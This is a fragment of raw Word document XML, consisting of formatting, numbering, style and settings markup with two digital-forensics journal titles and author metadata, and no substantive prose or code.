    <w:p w14:paraId="70714C86" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Journal of Digital Forensics, Security and Law</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22F0B1" w14:textId="459193E2" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096762A">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Digital Investigation: The International Journal of Digital Forensics &amp; Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67307D5D" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A463D90" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B4A2EB" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DAD089" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="0096762A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7C5E3F" w14:textId="77777777" w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidRDefault="0096762A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0096762A" w:rsidRPr="0096762A" w:rsidSect="005C26B5">
      <w:pgSz w:w="11140" w:h="16860"/>
      <w:pgMar w:top="1600" w:right="1560" w:bottom="280" w:left="1560"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7EFB1" w14:textId="77777777" w:rsidR="00A944FB" w:rsidRDefault="00A944FB" w:rsidP="00BA0812">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7AA667C3" w14:textId="77777777" w:rsidR="00A944FB" w:rsidRDefault="00A944FB" w:rsidP="00BA0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6FFB6A" w14:textId="77777777" w:rsidR="00A944FB" w:rsidRDefault="00A944FB" w:rsidP="00BA0812">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="326EF7E4" w14:textId="77777777" w:rsidR="00A944FB" w:rsidRDefault="00A944FB" w:rsidP="00BA0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C8F12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4" type="#_x0000_t75" alt="Arrow Slight curve" style="width:16.2pt;height:10.8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" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="" croptop="-18015f" cropbottom="-17083f"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00B13082"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47A4C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7A3181"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AFA66D0"/>
    <w:lvl w:ilvl="0" w:tplc="6226C490">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927" w:hanging="360"/>
      </w:p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2"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5A7A3549"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C78CCD70"/>
    <w:lvl w:ilvl="0" w:tplc="E0B64D2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlPicBulletId w:val="0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FD26370A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F7E6C4C4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3880CFF2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="26B66BA6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="57BC3650" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3960"/>
        </w:tabs>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1A768DAC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7658995C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5400"/>
        </w:tabs>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="01627096" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6120"/>
        </w:tabs>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="628E32EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CD8056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9D2"/>
    <w:rsid w:val="00056BB6"/>
    <w:rsid w:val="000F4DEB"/>
    <w:rsid w:val="00171782"/>
    <w:rsid w:val="001A401C"/>
    <w:rsid w:val="001B5513"/>
    <w:rsid w:val="0020337D"/>
    <w:rsid w:val="00293934"/>
    <w:rsid w:val="003710D6"/>
    <w:rsid w:val="003C5D69"/>
    <w:rsid w:val="00411EED"/>
    <w:rsid w:val="00415E55"/>
    <w:rsid w:val="004170ED"/>
    <w:rsid w:val="0044529A"/>
    <w:rsid w:val="004D3DA9"/>
    <w:rsid w:val="004E5562"/>
    <w:rsid w:val="00583A9A"/>
    <w:rsid w:val="005C26B5"/>
    <w:rsid w:val="0066330B"/>
    <w:rsid w:val="006A553D"/>
    <w:rsid w:val="006D678F"/>
    <w:rsid w:val="007D07AB"/>
    <w:rsid w:val="00820160"/>
    <w:rsid w:val="00846B55"/>
    <w:rsid w:val="00902109"/>
    <w:rsid w:val="00934BA7"/>
    <w:rsid w:val="0096762A"/>
    <w:rsid w:val="009A3F51"/>
    <w:rsid w:val="009F3DB4"/>
    <w:rsid w:val="00A944FB"/>
    <w:rsid w:val="00A969DF"/>
    <w:rsid w:val="00B90188"/>
    <w:rsid w:val="00BA0812"/>
    <w:rsid w:val="00DB7923"/>
    <w:rsid w:val="00DC0168"/>
    <w:rsid w:val="00E2633D"/>
    <w:rsid w:val="00E72A42"/>
    <w:rsid w:val="00ED621B"/>
    <w:rsid w:val="00F11631"/>
    <w:rsid w:val="00F279D2"/>
    <w:rsid w:val="00F66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B9145"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C7D7A708-1832-4A80-BA12-49370FDA0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7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C5D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6BB6"/>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BA0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812"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA0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812"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="004D3DA9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00203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717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1782"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0017178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71782"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0017178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3C5D6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C5D69"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B90188"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00415E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93150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="347408792">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="403187937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="554394709">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="776023140">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="875853306">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="880286315">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="950017931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962345981">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="989023267">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1001547565">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="145711482">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="748115340">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="847713256">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="DEE1E3"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="174425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543080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1364869074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1850752265">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="527958102">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1757945532">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="DEE1E3"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="206721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353653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1509253158">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1546719451">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1631285852">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1675186618">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1950039967">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2079397182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="211184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jp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EC52F-1EF4-44FB-A6D6-071887FC0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29</Pages>
  <Words>5923</Words>
  <Characters>33766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Mehulgiri Ashvingiri Goswami (2214858)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mehulgiri Ashvingiri Goswami (2214858)</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-11T23:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-12T07:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>